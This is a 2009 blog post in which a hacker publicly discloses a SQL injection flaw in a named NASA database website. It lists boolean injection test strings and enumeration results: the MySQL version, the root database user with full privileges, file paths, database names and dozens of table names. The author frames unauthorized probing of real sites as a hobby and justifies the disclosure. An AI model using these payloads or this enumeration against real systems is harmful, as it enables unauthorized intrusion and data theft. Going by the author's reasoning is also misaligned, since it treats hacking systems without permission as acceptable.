NASA Full-Disclosure! AGAIN

December 8th, 2009 TinKode Posted in MySQL Injection | 9 Comments »

 _   _                      _               _
| \ | | __ _ ___  __ _     / \   __ _  __ _(_)_ __
|  \| |/ _` / __|/ _` |   / _ \ / _` |/ _` | | '_ \
| |\  | (_| \__ \ (_| |  / ___ \ (_| | (_| | | | | |
|_| \_|\__,_|___/\__,_| /_/   \_\__, |\__,_|_|_| |_|
                                |___/

              #Full Disclosure... c0de.breaker

#Important
Ok. First of all, the reason I made this SQLi public ( even though I had no intention to make this ) , is because I found out that somebody else discovered the vulnerable parameter.I found this SQLi 3 months ago.
# Why do I test websites?
Because it is my hobby , and I want to prove that even the big websites, which should be highly secured, can be hacked. This is the reality , and it makes me sad.I feeling alright about what I�m doing, because if anyone finds a vulnerability before me , he/she could use it in harmful ways such as: shelling , rooting , backdooring , deleting etc

The WebSite Vulnerable: http://saif-1.larc.nasa.gov (CEOS Systems Analysis Database)

Testing:
(True) and 1=1–

(False) and 1=2–

Informations:

#Version: 5.1.31-community
#User: root@localhost
#Main Database: ceossadb
#Path of MySQL: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\

Also, the magic_quotes_gpc=OFF, and “user” from mysql have all privileges:

Bad…

Other Databases:

#ceossadb
#information_schema
#mysql
#ceosvis

Tables from “ceosvis” database:

#instrument
#takes
#measurement
#contains
#mission

Tables from main Database:

#agency
#alt_names
#cat_measurements
#cat_missions
#cat_series
#cat_wavebands
#ceosdbversion
#constellations
#data_access_links
#db_update_phases
#ecv
#instr
#instr_agencies
#instr_desc
#instr_geometry
#instr_maturity
#instr_mission
#instr_res_swath_temp
#instr_sampling
#instr_status
#instr_status_biz
#instr_technology
#instr_technology_rawdata
#instr_type
#instr_waveband
#mappedor1
#measurement_confidence
#measurement_desc
#measurement_type
#measurementtypesconfidencepilot
#measurementtypespending
#method
#mission_agencies
#mission_status
#missions
#obs_requirments
#orbit_sense
#orbit_type
#requirements
#series
#series_agency
#series_missions
#societal_benefits
#sys_diagrams
#taxonomy
#typeatmosphere
#typereqapplication
#typerequirementsource
#typesmeasurementsconfidencepilot
#wmo_measurement

I made this public, because I saw the website down, and I think the administrators will fix the vulnerability once someone reports the problem. (sorry because i didn’t make this first, if was that)